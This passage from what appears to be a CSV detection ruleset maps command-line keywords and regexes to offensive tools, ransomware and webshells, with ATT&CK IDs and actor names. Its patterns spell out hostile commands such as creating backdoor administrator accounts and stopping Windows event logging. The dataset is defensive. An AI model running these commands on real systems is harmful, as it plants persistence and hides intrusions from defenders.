TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","52754" "*nessus* --set listen_address=127.0.0.1*",".{0,1000}nessus.{0,1000}\s\-\-set\slisten_address\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52758" 
"*Nessus-*.deb*",".{0,1000}Nessus\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52759" "*Nessus-*.dmg*",".{0,1000}Nessus\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","#macos","N/A","9","10","N/A","N/A","N/A","N/A","52760" "*Nessus-*.msi*",".{0,1000}Nessus\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52761" "*Nessus-*.rpm*",".{0,1000}Nessus\-.{0,1000}\.rpm.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52762" "*Nessus-*.tar.gz*",".{0,1000}Nessus\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52763" "*Nessus-*.txz*",".{0,1000}Nessus\-.{0,1000}\.txz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability 
Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52764" "*nessus_vulns_cleaner.rc*",".{0,1000}nessus_vulns_cleaner\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52765" "*nessuscli fetch*",".{0,1000}nessuscli\sfetch.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","52766" "*nessuscli fix*",".{0,1000}nessuscli\sfix.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability 
Scanner","https://fr.tenable.com/products/nessus","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","52767" "*nessus-updates*.tar.gz*",".{0,1000}nessus\-updates.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52768" "*net domain_controllers*",".{0,1000}net\sdomain_controllers.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52778" "*net group *domain admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}domain\sadmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","net","Conti Ransomware Proxyshell PowerShell command #9","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - 
Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A","N/A","52790" "*net group *Enterprise Admins* /dom*",".{0,1000}net\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/dom.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52794" "*net group / domain *Domain Admins*",".{0,1000}net\sgroup\s\/\sdomain\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52801" "*net localg""""&pgh&""""roup *",".{0,1000}net\slocalg\""\&pgh\&\""roup\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","52805" "*net localg""""+ezyq+""""roup *",".{0,1000}net\slocalg\""\+ezyq\+\""roup\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","52806" "*net localgroup * AutoRDPwn /add*",".{0,1000}net\slocalgroup\s.{0,1000}\sAutoRDPwn\s\/add.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","52809" "*net localgroup administrators /add 
troll*",".{0,1000}net\slocalgroup\sadministrators\s\/add\stroll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","52813" "*net localgroup administrators backdoor*",".{0,1000}net\slocalgroup\sadministrators\sbackdoor.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52814" "*net localgroup administrators backdoor*",".{0,1000}net\slocalgroup\sadministrators\sbackdoor.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52815" "*net localgroup administrators BadAss /add*",".{0,1000}net\slocalgroup\sadministrators\sBadAss\s\/add.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive 
PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","52816" "*net localgroup administrators darkcodersc /add*",".{0,1000}net\slocalgroup\sadministrators\sdarkcodersc\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","52817" "*net localgroup administrators drat /add*",".{0,1000}net\slocalgroup\sadministrators\sdrat\s\/add.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","52818" "*net localgroup administrators 
icebreaker*",".{0,1000}net\slocalgroup\sadministrators\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","52819" "*net localgroup guests GuestUser /add*",".{0,1000}net\slocalgroup\sguests\sGuestUser\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","52822" "*net localgroup users GuestUser /delete*",".{0,1000}net\slocalgroup\susers\sGuestUser\s\/delete.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","52823" "*net start SysUpdate*",".{0,1000}net\sstart\sSysUpdate.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 
- T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52839" "*net stop \""windows event log\""*",".{0,1000}net\sstop\s\\\""windows\sevent\slog\\\"".{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","52866" "*net stop badrv*",".{0,1000}net\sstop\sbadrv.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52880" "*net stop IKEEXT*",".{0,1000}net\sstop\sIKEEXT.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","52900" "*net u""""+rmct+""""ser *",".{0,1000}net\su\""\+rmct\+\""ser\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","53030" "*net us""""&skj&""""er *",".{0,1000}net\sus\""\&skj\&\""er\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","53031" "*net user /add icebreaker *",".{0,1000}net\suser\s\/add\sicebreaker\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","53034" "*net user AutoRDPwn*",".{0,1000}net\suser\sAutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","53036" "*net user b4che10r *",".{0,1000}net\suser\sb4che10r\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","53037" "*net user backdoor 
Password123!*",".{0,1000}net\suser\sbackdoor\sPassword123!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53038" "*net user backdoor Password123!*",".{0,1000}net\suser\sbackdoor\sPassword123!.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53039" "*net user BadAss FacePalm01 /add*",".{0,1000}net\suser\sBadAss\sFacePalm01\s\/add.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","53040" "*net user darkcodersc /add*",".{0,1000}net\suser\sdarkcodersc\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53042" "*net user darkcodersc trousers*",".{0,1000}net\suser\sdarkcodersc\strousers.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53043" "*net user drat /del*",".{0,1000}net\suser\sdrat\s\/del.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","53044" "*net user drat drat /add*",".{0,1000}net\suser\sdrat\sdrat\s\/add.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","53045" "*net user GuestUser /add*",".{0,1000}net\suser\sGuestUser\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53047" "*net user HackMe *",".{0,1000}net\suser\sHackMe\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53048" "*net user HackMe /add*",".{0,1000}net\suser\sHackMe\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53049" "*net user HackMe ozlq6qwm*",".{0,1000}net\suser\sHackMe\sozlq6qwm.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - 
TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53050" "*net user hax0r /add*",".{0,1000}net\suser\shax0r\s\/add.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","53051" "*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","53052" "*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","53053" "*net user Tater *",".{0,1000}net\suser\sTater\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - 
T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","53059" "*net users /add troll Trolololol123*",".{0,1000}net\susers\s\/add\stroll\sTrolololol123.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","53060" "*net.fuzz *",".{0,1000}net\.fuzz\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53078" "*net.fuzz.*",".{0,1000}net\.fuzz\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 